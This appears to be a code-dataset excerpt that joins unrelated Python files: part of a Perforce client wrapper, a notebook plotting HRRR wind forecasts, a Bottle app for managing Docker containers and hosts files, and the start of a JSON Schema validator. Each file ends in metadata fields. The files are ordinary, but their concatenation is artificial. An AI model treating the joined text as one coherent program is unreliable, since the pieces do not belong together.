command = ' '.join(args)
startupinfo = None
if os.name == 'nt':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
proc = subprocess.Popen(
args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
startupinfo=startupinfo,
**kwargs
)
if stdin:
proc.stdin.write(six.b(stdin))
if marshal_output:
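            # With the -G flag, p4 writes a stream of marshalled Python
            # dictionaries to stdout; read them until EOF and raise on any
            # error record at or above the configured severity level.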
try:
while True:
record = marshal.load(proc.stdout)
if record.get(b'code', '') == b'error' and record[b'severity'] >= self._level:
proc.stdin.close()
proc.stdout.close()
raise errors.CommandError(record[b'data'], record, command)
if isinstance(record, dict):
if six.PY2:
records.append(record)
else:
records.append({str(k, 'utf8'): str(v) if isinstance(v, int) else str(v, 'utf8', errors='ignore') for k, v in record.items()})
except EOFError:
pass
stdout, stderr = proc.communicate()
else:
records, stderr = proc.communicate()
if stderr:
raise errors.CommandError(stderr, command)
return records
@split_ls
def ls(self, files, silent=True, exclude_deleted=False):
"""List files
:param files: Perforce file spec
:type files: list
:param silent: Will not raise error for invalid files or files not under the client
:type silent: bool
:param exclude_deleted: Exclude deleted files from the query
:type exclude_deleted: bool
:raises: :class:`.errors.RevisionError`
:returns: list<:class:`.Revision`>
"""
try:
cmd = ['fstat']
if exclude_deleted:
cmd += ['-F', '^headAction=delete ^headAction=move/delete']
cmd += files
results = self.run(cmd)
except errors.CommandError as err:
if silent:
results = []
elif "is not under client's root" in str(err):
raise errors.RevisionError(err.args[0])
else:
raise
return [Revision(r, self) for r in results if r.get('code') != 'error']
def findChangelist(self, description=None):
"""Gets or creates a Changelist object with a description
:param description: The description to set or lookup
:type description: str
:returns: :class:`.Changelist`
"""
if description is None:
change = Default(self)
else:
if isinstance(description, six.integer_types):
change = Changelist(description, self)
else:
pending = self.run(['changes', '-l', '-s', 'pending', '-c', str(self._client), '-u', self._user])
for cl in pending:
if cl['desc'].strip() == description.strip():
LOGGER.debug('Changelist found: {}'.format(cl['change']))
change = Changelist(int(cl['change']), self)
break
else:
LOGGER.debug('No changelist found, creating one')
change = Changelist.create(description, self)
change.client = self._client
change.save()
return change
def add(self, filename, change=None):
"""Adds a new file to a changelist
:param filename: File path to add
:type filename: str
:param change: Changelist to add the file to
:type change: int
:returns: :class:`.Revision`
"""
try:
if not self.canAdd(filename):
raise errors.RevisionError('File is not under client path')
if change is None:
self.run(['add', filename])
else:
self.run(['add', '-c', str(change.change), filename])
data = self.run(['fstat', filename])[0]
except errors.CommandError as err:
LOGGER.debug(err)
raise errors.RevisionError('File is not under client path')
rev = Revision(data, self)
if isinstance(change, Changelist):
change.append(rev)
return rev
def canAdd(self, filename):
"""Determines if a filename can be added to the depot under the current client
:param filename: File path to add
:type filename: str
"""
try:
result = self.run(['add', '-n', '-t', 'text', filename])[0]
except errors.CommandError as err:
LOGGER.debug(err)
return False
if result.get('code') not in ('error', 'info'):
return True
LOGGER.warn('Unable to add {}: {}'.format(filename, result['data']))
return False
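    @property
    def default(self):
        # ``Changelist.remove`` below references ``self._connection.default``, but
        # no such attribute is defined elsewhere in this module; this property is
        # an assumed sketch returning the default changelist for this connection.
        return Default(self)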
@six.python_2_unicode_compatible
class PerforceObject(object):
"""Abstract class for dealing with the dictionaries coming back from p4 commands
This is a simple descriptor for the incoming P4Dict
"""
def __init__(self, connection=None):
self._connection = connection or Connection()
self._p4dict = {}
def __str__(self):
return self.__unicode__()
def __unicode__(self):
return u'<{}>'.format(self.__class__.__name__)
def __repr__(self):
return self.__unicode__()
class FormObject(PerforceObject):
"""Abstract class for objects with a form api (client, stream, changelist)"""
READONLY = ()
COMMAND = ''
def __init__(self, connection):
super(FormObject, self).__init__(connection)
self._dirty = False
def save(self):
"""Saves the state of the changelist"""
if not self._dirty:
return
fields = []
formdata = dict(self._p4dict)
del formdata['code']
for key, value in six.iteritems(formdata):
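            # Keys that end in a digit (e.g. 'view0', 'view1') are entries of a
            # multi-line form field; strip the index and emit them as
            # tab-indented continuation lines of that field.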
match = re.search('\d$', key)
if match:
value = '\t{}'.format(value)
key = key[:match.start()]
value = value.replace('\n', '\n\t')
fields.append('{}: {}'.format(key, value))
form = '\n'.join(fields)
self._connection.run([self.COMMAND, '-i'], stdin=form, marshal_output=False)
self._dirty = False
class Changelist(PerforceObject):
"""
A Changelist is a collection of files that will be submitted as a single entry with a description and
timestamp
"""
def __init__(self, changelist=None, connection=None):
connection = connection or Connection()
super(Changelist, self).__init__(connection=connection)
self._files = None
self._dirty = False
self._reverted = False
self._change = changelist
self.query(files=False)
def __repr__(self):
return '<Changelist {}>'.format(self._change)
def __int__(self):
return int(self._change)
def __nonzero__(self):
return True
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
if exc_type:
LOGGER.debug(traceback.format_exc())
raise errors.ChangelistError(exc_value)
self.save()
def __contains__(self, other):
if not isinstance(other, Revision):
raise TypeError('Value needs to be a Revision instance')
if self._files is None:
self.query()
names = [f.depotFile for f in self._files]
return other.depotFile in names
def __getitem__(self, name):
if self._files is None:
self.query()
return self._files[name]
def __len__(self):
if self._files is None:
self.query()
return len(self._files)
def __iadd__(self, other):
if self._files is None:
self.query()
if isinstance(other, list):
currentfiles = self._files[:]
try:
files = [str(f) for f in other]
cmd = ['edit', '-c', str(self.change)]
self._connection.run(cmd + files)
self._files += other
self.save()
except errors.CommandError:
self._files = currentfiles
raise
return self
def __eq__(self, other):
return int(self) == int(other)
def __format__(self, *args, **kwargs):
if self._files is None:
self.query()
kwargs = {
'change': self._p4dict['change'],
'client': str(self._p4dict['client']),
'user': self._p4dict['user'],
'status': self._p4dict['status'],
'description': self._p4dict['description'].replace('\n', '\n\t'),
'files': '\n'.join(['\t{}'.format(f.depotFile) for f in self._files])
}
return FORMAT.format(**kwargs)
def query(self, files=True):
"""Queries the depot to get the current status of the changelist"""
if self._change:
cl = str(self._change)
self._p4dict = {camel_case(k): v for k, v in six.iteritems(self._connection.run(['change', '-o', cl])[0])}
if files:
self._files = []
if self._p4dict.get('status') == 'pending' or self._change == 0:
change = self._change or 'default'
data = self._connection.run(['opened', '-c', str(change)])
self._files = [Revision(r, self._connection) for r in data]
else:
data = self._connection.run(['describe', str(self._change)])[0]
depotfiles = []
for k, v in six.iteritems(data):
if k.startswith('depotFile'):
depotfiles.append(v)
self._files = self._connection.ls(depotfiles)
def append(self, rev):
"""Adds a :py:class:Revision to this changelist and adds or checks it out if needed
:param rev: Revision to add
:type rev: :class:`.Revision`
"""
if not isinstance(rev, Revision):
results = self._connection.ls(rev)
if not results:
self._connection.add(rev, self)
return
rev = results[0]
        if rev not in self:
if rev.isMapped:
rev.edit(self)
self._files.append(rev)
rev.changelist = self
self._dirty = True
def remove(self, rev, permanent=False):
"""Removes a revision from this changelist
:param rev: Revision to remove
:type rev: :class:`.Revision`
:param permanent: Whether or not we need to set the changelist to default
:type permanent: bool
"""
if not isinstance(rev, Revision):
raise TypeError('argument needs to be an instance of Revision')
if rev not in self:
raise ValueError('{} not in changelist'.format(rev))
self._files.remove(rev)
if not permanent:
rev.changelist = self._connection.default
def revert(self, unchanged_only=False):
"""Revert all files in this changelist
:param unchanged_only: Only revert unchanged files
:type unchanged_only: bool
:raises: :class:`.ChangelistError`
"""
if self._reverted:
raise errors.ChangelistError('This changelist has been reverted')
change = self._change
if self._change == 0:
change = 'default'
cmd = ['revert', '-c', str(change)]
if unchanged_only:
cmd.append('-a')
files = [f.depotFile for f in self._files]
if files:
cmd += files
self._connection.run(cmd)
self._files = []
self._reverted = True
def save(self):
"""Saves the state of the changelist"""
self._connection.run(['change', '-i'], stdin=format(self), marshal_output=False)
self._dirty = False
def submit(self):
"""Submits a chagelist to the depot"""
if self._dirty:
self.save()
self._connection.run(['submit', '-c', str(self._change)], marshal_output=False)
def delete(self):
"""Reverts all files in this changelist then deletes the changelist from perforce"""
try:
self.revert()
except errors.ChangelistError:
pass
self._connection.run(['change', '-d', str(self._change)])
@property
def change(self):
return int(self._change)
@property
def client(self):
"""Perforce client this changelist is under"""
return self._p4dict['client']
@client.setter
def client(self, client):
self._p4dict['client'] = client
self._dirty = True
@property
def description(self):
"""Changelist description"""
return self._p4dict['description'].strip()
@description.setter
def description(self, desc):
self._p4dict['description'] = desc.strip()
self._dirty = True
@property
def status(self):
return self._p4dict['status']
@property
def user(self):
return self._p4dict['user']
@property
def isDirty(self):
"""Does this changelist have unsaved changes"""
return self._dirty
@property
def time(self):
"""Creation time of this changelist"""
return datetime.datetime.strptime(self._p4dict['date'], DATE_FORMAT)
@staticmethod
def create(description='<Created by Python>', connection=None):
"""Creates a new changelist
:param connection: Connection to use to create the changelist
:type connection: :class:`.Connection`
:param description: Description for new changelist
:type description: str
:returns: :class:`.Changelist`
"""
connection = connection or Connection()
description = description.replace('\n', '\n\t')
form = NEW_FORMAT.format(client=str(connection.client), description=description)
result = connection.run(['change', '-i'], stdin=form, marshal_output=False)
return Changelist(int(result.split()[1]), connection)
class Default(Changelist):
def __init__(self, connection):
super(Default, self).__init__(None, connection)
data = self._connection.run(['opened', '-c', 'default'])
for f in data:
if self._files is None:
self._files = []
self._files.append(Revision(f, self._connection))
data = self._connection.run(['change', '-o'])[0]
self._change = 0
self._description = data['Description']
self._client = connection.client
self._time = None
self._status = 'new'
self._user = connection.user
def save(self):
"""Saves the state of the changelist"""
files = [f.depotFile for f in self._files]
cmd = ['reopen', '-c', 'default']
self._connection.run(cmd + files)
self._dirty = False
class Revision(PerforceObject):
"""A Revision represents a file on perforce at a given point in it's history"""
def __init__(self, data, connection=None):
connection = connection or Connection()
super(Revision, self).__init__(connection=connection)
if isinstance(data, six.string_types):
self._p4dict = {'depotFile': data}
self.query()
else:
self._p4dict = data
self._head = HeadRevision(self._p4dict)
self._changelist = None
self._filename = None
def __len__(self):
if 'fileSize' not in self._p4dict:
self._p4dict = self._connection.run(['fstat', '-m', '1', '-Ol', self.depotFile])[0]
return int(self._p4dict['fileSize'])
def __unicode__(self):
return self.depotFile
def __repr__(self):
return '<%s: %s#%s>' % (self.__class__.__name__, self.depotFile, self.revision)
def __int__(self):
return self.revision
def query(self):
"""Runs an fstat for this file and repopulates the data"""
self._p4dict = self._connection.run(['fstat', '-m', '1', self._p4dict['depotFile']])[0]
self._head = HeadRevision(self._p4dict)
self._filename = self.depotFile
def edit(self, changelist=0):
"""Checks out the file
:param changelist: Optional changelist to checkout the file into
:type changelist: :class:`.Changelist`
"""
command = 'reopen' if self.action in ('add', 'edit') else 'edit'
if int(changelist):
self._connection.run([command, '-c', str(changelist.change), self.depotFile])
else:
self._connection.run([command, self.depotFile])
self.query()
def lock(self, lock=True, changelist=0):
"""Locks or unlocks the file
:param lock: Lock or unlock the file
:type lock: bool
:param changelist: Optional changelist to checkout the file into
:type changelist: :class:`.Changelist`
"""
cmd = 'lock' if lock else 'unlock'
if changelist:
self._connection.run([cmd, '-c', changelist, self.depotFile])
else:
self._connection.run([cmd, self.depotFile])
self.query()
def sync(self, force=False, safe=True, revision=0, changelist=0):
"""Syncs the file at the current revision
:param force: Force the file to sync
:type force: bool
:param safe: Don't sync files that were changed outside perforce
:type safe: bool
:param revision: Sync to a specific revision
:type revision: int
:param changelist: Changelist to sync to
:type changelist: int
"""
cmd = ['sync']
if force:
cmd.append('-f')
if safe:
cmd.append('-s')
if revision:
cmd.append('{}#{}'.format(self.depotFile, revision))
elif changelist:
cmd.append('{}@{}'.format(self.depotFile, changelist))
else:
cmd.append(self.depotFile)
self._connection.run(cmd)
self.query()
def revert(self, unchanged=False):
"""Reverts any file changes
:param unchanged: Only revert if the file is unchanged
:type unchanged: bool
"""
cmd = ['revert']
if unchanged:
cmd.append('-a')
wasadd = self.action == 'add'
cmd.append(self.depotFile)
self._connection.run(cmd)
if 'movedFile' in self._p4dict:
self._p4dict['depotFile'] = self._p4dict['movedFile']
if not wasadd:
self.query()
if self._changelist:
self._changelist.remove(self, permanent=True)
def shelve(self, changelist=None):
"""Shelves the file if it is in a changelist
:param changelist: Changelist to add the move to
:type changelist: :class:`.Changelist`
"""
if changelist is None and self.changelist.description == 'default':
            raise errors.ShelveError('Unable to shelve files in the default changelist')
cmd = ['shelve']
if changelist:
cmd += ['-c', str(changelist)]
cmd.append(self.depotFile)
self._connection.run(cmd)
self.query()
def move(self, dest, changelist=0, force=False):
"""Renames/moves the file to dest
:param dest: Destination to move the file to
:type dest: str
:param changelist: Changelist to add the move to
:type changelist: :class:`.Changelist`
:param force: Force the move to an existing file
:type force: bool
"""
cmd = ['move']
if force:
cmd.append('-f')
if changelist:
cmd += ['-c', str(changelist)]
if not self.isEdit:
self.edit(changelist)
cmd += [self.depotFile, dest]
self._connection.run(cmd)
self._p4dict['depotFile'] = dest
self.query()
def delete(self, changelist=0):
"""Marks the file for delete
:param changelist: Changelist to add the move to
:type changelist: :class:`.Changelist`
"""
cmd = ['delete']
if changelist:
cmd += ['-c', str(changelist)]
cmd.append(self.depotFile)
self._connection.run(cmd)
self.query()
@property
def hash(self):
"""The hash value of the current revision"""
if 'digest' not in self._p4dict:
self._p4dict = self._connection.run(['fstat', '-m', '1', '-Ol', self.depotFile])[0]
return self._p4dict['digest']
@property
def clientFile(self):
"""The local path to the revision"""
return path.path(self._p4dict['clientFile'])
@property
def depotFile(self):
"""The depot path to the revision"""
return path.path(self._p4dict['depotFile'])
@property
def isMapped(self):
"""Is the file mapped to the current workspace"""
return 'isMapped' in self._p4dict
@property
def isShelved(self):
"""Is the file shelved"""
return 'shelved' in self._p4dict
@property
def revision(self):
"""Revision number"""
rev = self._p4dict.get('haveRev', -1)
if rev == 'none':
rev = 0
return int(rev)
@property
def description(self):
return self._p4dict.get('desc')
@property
def action(self):
"""The current action: add, edit, etc."""
return self._p4dict.get('action')
@property
def changelist(self):
"""Which :class:`.Changelist` is this revision in"""
if self._changelist:
return self._changelist
if self._p4dict['change'] == 'default':
return Default(connection=self._connection)
else:
return Changelist(str(self._p4dict['change']), self._connection)
@changelist.setter
def changelist(self, value):
if not isinstance(value, Changelist):
raise TypeError('argument needs to be an instance of Changelist')
if self not in value:
value.append(self)
self._changelist = value
@property
def type(self):
"""Best guess at file type. text or binary"""
if self.action == 'edit':
return self._p4dict['type']
return None
@property
def isResolved(self):
"""Is the revision resolved"""
return self.unresolved == 0
@property
def resolved(self):
"""The number, if any, of resolved integration records"""
return int(self._p4dict.get('resolved', 0))
@property
def unresolved(self):
"""The number, if any, of unresolved integration records"""
return int(self._p4dict.get('unresolved', 0))
@property
def openedBy(self):
"""Who has this file open for edit"""
return self._p4dict.get('otherOpen', [])
@property
def lockedBy(self):
"""Who has this file locked"""
return self._p4dict.get('otherLock', [])
@property
def isLocked(self):
"""Is the file locked by anyone excluding the current user"""
return 'ourLock' in self._p4dict or 'otherLock' in self._p4dict
@property
def head(self):
"""The :class:`.HeadRevision` of this file"""
return self._head
@property
def isSynced(self):
"""Is the local file the latest revision"""
return self.revision == self.head.revision
@property
def isEdit(self):
"""Is the file open for edit"""
return self.action == 'edit'
class HeadRevision(object):
"""The HeadRevision represents the latest version on the Perforce server"""
def __init__(self, filedict):
self._p4dict = filedict
@property
def action(self):
return self._p4dict['headAction']
@property
def change(self):
return int(self._p4dict['headChange']) if self._p4dict['headChange'] else 0
@property
def revision(self):
return int(self._p4dict['headRev'])
@property
def type(self):
return self._p4dict['headType']
@property
def time(self):
return datetime.datetime.fromtimestamp(int(self._p4dict['headTime']))
@property
def modifiedTime(self):
return datetime.datetime.fromtimestamp(int(self._p4dict['headModTime']))
class Client(FormObject):
"""Represents a client(workspace) for a given connection"""
COMMAND = 'client'
def __init__(self, client, connection=None):
super(Client, self).__init__(connection=connection)
assert client is not None
results = self._connection.run(['client', '-o', client])[0]
self._p4dict = {camel_case(k): v for k, v in six.iteritems(results)}
def __unicode__(self):
return self.client
@property
def root(self):
"""Root path fo the client"""
return path.Path(self._p4dict['root'])
@property
def client(self):
return self._p4dict['client']
@property
def description(self):
return self._p4dict['description'].strip()
@description.setter
def description(self, value):
self._p4dict['description'] = value.strip()
self._dirty = True
@property
def host(self):
return self._p4dict['host']
@host.setter
def host(self, value):
self._p4dict['host'] = value
self._dirty = True
@property
def lineEnd(self):
return self._p4dict['lineEnd']
@lineEnd.setter
def lineEnd(self, value):
self._p4dict['lineEnd'] = value
self._dirty = True
@property
def owner(self):
return self._p4dict['owner']
@owner.setter
def owner(self, value):
self._p4dict['owner'] = value
self._dirty = True
@property
def submitOptions(self):
return self._p4dict['submitOptions']
@submitOptions.setter
def submitOptions(self, value):
self._p4dict['submitOptions'] = value
self._dirty = True
@property
def view(self):
"""A list of view specs"""
spec = []
for k, v in six.iteritems(self._p4dict):
if k.startswith('view'):
match = RE_FILESPEC.search(v)
if match:
spec.append(FileSpec(v[:match.end() - 1], v[match.end():]))
return spec
@property
def access(self):
"""The date and time last accessed"""
return datetime.datetime.strptime(self._p4dict['access'], DATE_FORMAT)
@property
def update(self):
"""The date and time the client was updated"""
return datetime.datetime.strptime(self._p4dict['update'], DATE_FORMAT)
@property
def stream(self):
"""Which stream, if any, the client is under"""
stream = self._p4dict.get('stream')
if stream:
return Stream(stream, self._connection)
class Stream(PerforceObject):
"""An object representing a perforce stream"""
def __init__(self, stream, connection=None):
super(Stream, self).__init__(connection=connection)
assert stream is not None
results = self._connection.run(['stream', '-o', '-v', stream])[0]
self._p4dict = {camel_case(k): v for k, v in six.iteritems(results)}
def __unicode__(self):
return self._p4dict['stream']
@property
def description(self):
"""Stream description tha thas been trimmed"""
return self._p4dict.get('description', '').strip()
@property
def view(self):
"""A list of view specs"""
spec = []
for k, v in six.iteritems(self._p4dict):
if k.startswith('view'):
match = RE_FILESPEC.search(v)
if match:
spec.append(FileSpec(v[:match.end() - 1], v[match.end():]))
return spec
@property
def access(self):
"""The date and time last accessed"""
return datetime.datetime.strptime(self._p4dict['access'], DATE_FORMAT)
@property
def update(self):
"""The date and time the client was updated"""
return datetime.datetime.strptime(self._p4dict['update'], DATE_FORMAT)
| mit | -9,058,517,573,385,367,000 | 28.361386 | 154 | 0.563199 | false |
rsignell-usgs/notebook | Siphon/hrrr_wind.py | 1 | 2948 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import matplotlib.pyplot as plt
import numpy as np
%matplotlib inline
# <headingcell level=2>
# Extract HRRR data using Unidata's Siphon package
# <codecell>
# Resolve the latest HRRR dataset
from siphon.catalog import TDSCatalog
latest_hrrr = TDSCatalog('http://thredds-jumbo.unidata.ucar.edu/thredds/catalog/grib/HRRR/CONUS_3km/surface/latest.xml')
hrrr_ds = list(latest_hrrr.datasets.values())[0]
# Set up access via NCSS
from siphon.ncss import NCSS
ncss = NCSS(hrrr_ds.access_urls['NetcdfSubset'])
# Create a query to ask for all times in netcdf4 format for
# the Temperature_surface variable, with a bounding box
query = ncss.query()
# <codecell>
dap_url = hrrr_ds.access_urls['OPENDAP']
# <codecell>
query.all_times().accept('netcdf4').variables('u-component_of_wind_height_above_ground',
'v-component_of_wind_height_above_ground')
query.lonlat_box(45, 41., -63, -71.5)
# Get the raw bytes and write to a file.
data = ncss.get_data_raw(query)
with open('test_uv.nc', 'wb') as outf:
outf.write(data)
# <headingcell level=2>
# Try reading extracted data with Xray
# <codecell>
import xray
# <codecell>
nc = xray.open_dataset('test_uv.nc')
# <codecell>
nc
# <codecell>
uvar_name='u-component_of_wind_height_above_ground'
vvar_name='v-component_of_wind_height_above_ground'
uvar = nc[uvar_name]
vvar = nc[vvar_name]
# <codecell>
uvar
# <codecell>
grid = nc[uvar.grid_mapping]
grid
# <codecell>
lon0 = grid.longitude_of_central_meridian
lat0 = grid.latitude_of_projection_origin
lat1 = grid.standard_parallel
earth_radius = grid.earth_radius
# <headingcell level=2>
# Try plotting the LambertConformal data with Cartopy
# <codecell>
import cartopy
import cartopy.crs as ccrs
# <codecell>
#cartopy wants meters, not km
x = uvar.x.data*1000.
y = uvar.y.data*1000.
# <codecell>
# <codecell>
#globe = ccrs.Globe(ellipse='WGS84') #default
globe = ccrs.Globe(ellipse='sphere', semimajor_axis=grid.earth_radius)
crs = ccrs.LambertConformal(central_longitude=lon0, central_latitude=lat0,
standard_parallels=(lat0,lat1), globe=globe)
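# The projection is rebuilt from the dataset's own grid-mapping attributes
# (spherical earth radius, central meridian/latitude, standard parallels) so
# the projected x/y coordinates from the file line up with the map.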
# <codecell>
print(uvar.x.data.shape)
print(uvar.y.data.shape)
print(uvar.data.shape)
# <codecell>
uvar[6,:,:].time1.data
# <codecell>
istep =6
klev = 0
u = uvar[istep,klev,:,:].data
v = vvar[istep,klev,:,:].data
spd = np.sqrt(u*u+v*v)
# <codecell>
fig = plt.figure(figsize=(10,16))
ax = plt.axes(projection=ccrs.PlateCarree())
c = ax.pcolormesh(x,y,spd, transform=crs,zorder=0)
cb = fig.colorbar(c,orientation='vertical',shrink=0.5)
cb.set_label('m/s')
ax.coastlines(resolution='10m',color='black',zorder=1)
ax.quiver(x,y,u,v,transform=crs,zorder=2,scale=100)
gl = ax.gridlines(draw_labels=True)
gl.xlabels_top = False
gl.ylabels_right = False
plt.title(uvar[istep].time1.data);
plt.axis([-72,-69.8,40.6, 43.5]);
# <codecell>
| mit | -7,181,985,171,809,236,000 | 19.472222 | 120 | 0.698779 | false |
Kostanos/domg | app.py | 1 | 9634 | #!/usr/bin/env python
# coding=utf-8
"""
The manager
"""
import json
import os
import re
from time import strptime, mktime
import bottle
from datetime import datetime
from docker import Client
from docker.errors import APIError
from hostmanager import HOSTS_PATH
from lib import FlashMsgPlugin, Hosts, group_containers_by_name, human
STATIC = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'static')
docker = Client()
app = bottle.default_app()
bottle.SimpleTemplate.defaults = {'app': app}
bottle.TEMPLATE_PATH.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), 'views'))
PORTS_AND_ICONS = {
'default': 'glyphicon-minus white',
'4200': "glyphicon-console",
'3306': "glyphicon-oil",
'8080': "glyphicon-globe",
'80': "glyphicon-globe",
'443': "glyphicon-globe",
}
def generate_menu():
items = [
('Containers', '/'),
('Images', '/images'),
('Hosts', '/hosts'),
]
current_route = bottle.request.route
menu = []
for item in items:
label, url = item
try:
irt, args = bottle.default_app().match({'PATH_INFO': url, 'REQUEST_METHOD': bottle.request.method})
except bottle.HTTPError:
irt = None
active = ' class="active"' if irt and current_route.name == irt.name else ''
menu.append('<li%s><a href="%s">%s</a></li>' % (active, url, label))
return " ".join(menu)
@bottle.route('/', name="index", method="GET")
def index():
running = docker.containers(quiet=True, all=True)
container_list = []
for con in running:
container_info = docker.inspect_container(con['Id'])
container_list.append(container_info)
running_containers = [container for container in container_list if container['State']['Running'] is True]
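    # Containers whose Config.Image is a raw 64-character hex ID (rather than a
    # repo:tag name) are grouped in the lists below as "computer" containers;
    # containers built from named images are treated as "human" containers.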
human_containers = [container for container in container_list if
container['State']['Running'] is False
and len(re.findall(r"^[a-f\d]{64}$|^[A-F\d]{64}$", container['Config']['Image'])) == 0]
computer_containers = [container for container in container_list if
container['State']['Running'] is False
and len(re.findall(r"^[a-f\d]{64}$|^[A-F\d]{64}$", container['Config']['Image'])) == 1]
# Sort by name
running_containers, human_containers, computer_containers = \
sorted(running_containers, key=lambda x: x['Name']), \
sorted(human_containers, key=lambda x: x['Name']), \
sorted(computer_containers, key=lambda x: x['Name'])
# Then by last used
running_containers, human_containers, computer_containers = \
sorted(running_containers, key=lambda x: x['State']['StartedAt'], reverse=True), \
sorted(human_containers, key=lambda x: x['State']['StartedAt'], reverse=True), \
sorted(computer_containers, key=lambda x: x['State']['StartedAt'], reverse=True)
hostname = bottle.request.get_header('Host', 'localhost').split(':')[0]
running_containers = group_containers_by_name(running_containers)
human_containers = group_containers_by_name(human_containers)
computer_containers = group_containers_by_name(computer_containers)
return bottle.template('index.html',
title="DoMG",
menu=generate_menu(),
hosts=Hosts(HOSTS_PATH).get_reversed(),
running_containers=running_containers,
human_containers=human_containers,
computer_containers=computer_containers,
hostname=hostname)
@bottle.route('/details/<container_id>', name="details", method="GET")
def container_details(container_id):
details = docker.inspect_container(container_id)
started_at = datetime.fromtimestamp(
mktime(strptime(details['State']['StartedAt'].split('.')[0], "%Y-%m-%dT%H:%M:%S")))
raw_finished_at = details['State']['FinishedAt'].split('.')
if len(raw_finished_at) == 2:
raw_finished_at = raw_finished_at[0]
else:
raw_finished_at = '0001-01-01T00:00:00'
finished_at = datetime.fromtimestamp(
mktime(strptime(raw_finished_at, "%Y-%m-%dT%H:%M:%S")))
details['State']['StartedAt'] = human(started_at, past_tense='{}', future_tense='{}')
details['State']['FinishedAt'] = human(finished_at)
details['State']['UpFor'] = human(finished_at - started_at, past_tense='{}', future_tense='{}')
details['State']['UpFor'] = details['State']['UpFor'] if details['State']['UpFor'] else 'less than a second'
return bottle.template('details.html',
title="DoMG",
menu=generate_menu(),
details=details)
@bottle.route('/images', name="images", method="GET")
def list_images():
images = docker.images()
image_details = [{'tags': img['RepoTags'], 'inspect': docker.inspect_image(img['Id'])} for img in images]
return bottle.template('images.html', title="Images | DoMG", menu=generate_menu(), images=image_details)
@bottle.route('/deleteimage/<image_id>', name="image_delete", method="GET")
def image_delete(image_id):
try:
docker.remove_image(image_id)
app.flash('Deleted image <em>%s</em>!' % image_id)
except APIError as e:
app.flash(e.explanation, 'danger')
return bottle.redirect(bottle.request.headers.get('Referer', '/images').strip())
@bottle.route('/logs/<container_id>', name="logs", method="GET")
def logs(container_id):
log = docker.logs(container_id)
if bottle.request.headers.get('X-Requested-With') == 'XMLHttpRequest':
return '<pre>%s</pre>' % log
return bottle.template('logs.html', title="Logs | DoMG", menu=generate_menu(), log=log)
@bottle.route('/delete/<container_id>', name="delete", method="GET")
def container_delete(container_id):
try:
docker.remove_container(container_id)
app.flash('Deleted container <em>%s</em>!' % container_id)
except APIError as e:
app.flash(e.explanation, 'danger')
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/stop/<container_id>', name="stop", method="GET")
def container_stop(container_id):
try:
docker.stop(container_id)
except APIError as e:
bottle.response.content_type = 'application/json'
return json.dumps({
'error': e.explanation
})
if bottle.request.headers.get('X-Requested-With') == 'XMLHttpRequest':
bottle.response.content_type = 'application/json'
return json.dumps({
'href': '/start/%s' % container_id,
'icon': 'glyphicon-play green'
})
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/start/<container_id>', name="start", method="GET")
def container_start(container_id):
try:
docker.start(container_id)
except APIError as e:
bottle.response.content_type = 'application/json'
return json.dumps({
'error': e.explanation
})
if bottle.request.headers.get('X-Requested-With') == 'XMLHttpRequest':
bottle.response.content_type = 'application/json'
return json.dumps({
'href': '/stop/%s' % container_id,
'icon': 'glyphicon-stop red'
})
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/static/<path:path>')
def callback(path):
return bottle.static_file(path, STATIC)
@bottle.route('/hosts', name="hosts", method="GET")
def list_hosts():
hosts = Hosts(HOSTS_PATH)
running_containers = [docker.inspect_container(container['Id']) for container in docker.containers(quiet=True)]
ip_list = [info['NetworkSettings']['IPAddress'] for info in running_containers if
'IPAddress' in info['NetworkSettings']]
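    # 172.17.0.x is the default docker0 bridge subnet, so only host entries in
    # that range are treated as container-managed records by the template.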
return bottle.template('hosts.html',
title="Hosts | DoMG",
menu=generate_menu(),
hosts=hosts,
active_ip_list=ip_list,
begins_with='172.17.0.')
@bottle.route('/delete-host/<hostname>', name="delete_host", method="GET")
def delete_host(hostname):
hosts = Hosts(HOSTS_PATH)
hosts.remove_one(hostname)
hosts.write(HOSTS_PATH)
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/delete-inactive-hosts', name="delete_inactive_hosts", method="GET")
def delete_inactive_hosts():
running_containers = [docker.inspect_container(container['Id']) for container in docker.containers(quiet=True)]
active_ip_list = [info['NetworkSettings']['IPAddress'] for info in running_containers if
'IPAddress' in info['NetworkSettings']]
hosts = Hosts(HOSTS_PATH)
reversed_list = hosts.get_reversed()
for ip in reversed_list:
if ip[0:9] == '172.17.0.' and ip not in active_ip_list:
hosts.remove_all(reversed_list[ip])
hosts.write(HOSTS_PATH)
return bottle.redirect(bottle.request.headers.get('Referer', '/').strip())
@bottle.route('/test')
def test():
hosts_contents = docker.execute('rebagg_mysql_1', 'cat /etc/hosts')
return hosts_contents
if __name__ == '__main__':
import socket
my_ip = socket.gethostbyname(socket.gethostname())
# print("Go to http://" + my_ip + "/")
print("Hit Ctrl+C to stop")
app.install(FlashMsgPlugin(secret='somethingelse'))
bottle.run(host='0.0.0.0', port=80, quiet=True)
| mit | -496,082,090,395,185,600 | 37.38247 | 115 | 0.618642 | false |
johnnoone/json-spec | src/jsonspec/validators/draft04.py | 1 | 26115 | """
jsonspec.validators.draft04
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements JSON Schema draft04.
"""
from __future__ import absolute_import
import logging
import re
from copy import deepcopy
from decimal import Decimal
from six import integer_types, string_types
from six.moves.urllib.parse import urljoin
from .bases import ReferenceValidator, Validator
from .exceptions import CompilationError
from .factorize import register
from jsonspec.validators.exceptions import ValidationError
from jsonspec.validators.util import uncamel
from jsonspec.validators.pointer_util import pointer_join
from jsonspec import driver as json
__all__ = ['compile', 'Draft04Validator']
sequence_types = (list, set, tuple)
number_types = (integer_types, float, Decimal)
logger = logging.getLogger(__name__)
@register(spec='http://json-schema.org/draft-04/schema#')
def compile(schema, pointer, context, scope=None):
"""
Compiles schema with `JSON Schema`_ draft-04.
:param schema: obj to compile
:type schema: Mapping
:param pointer: uri of the schema
:type pointer: Pointer, str
:param context: context of this schema
:type context: Context
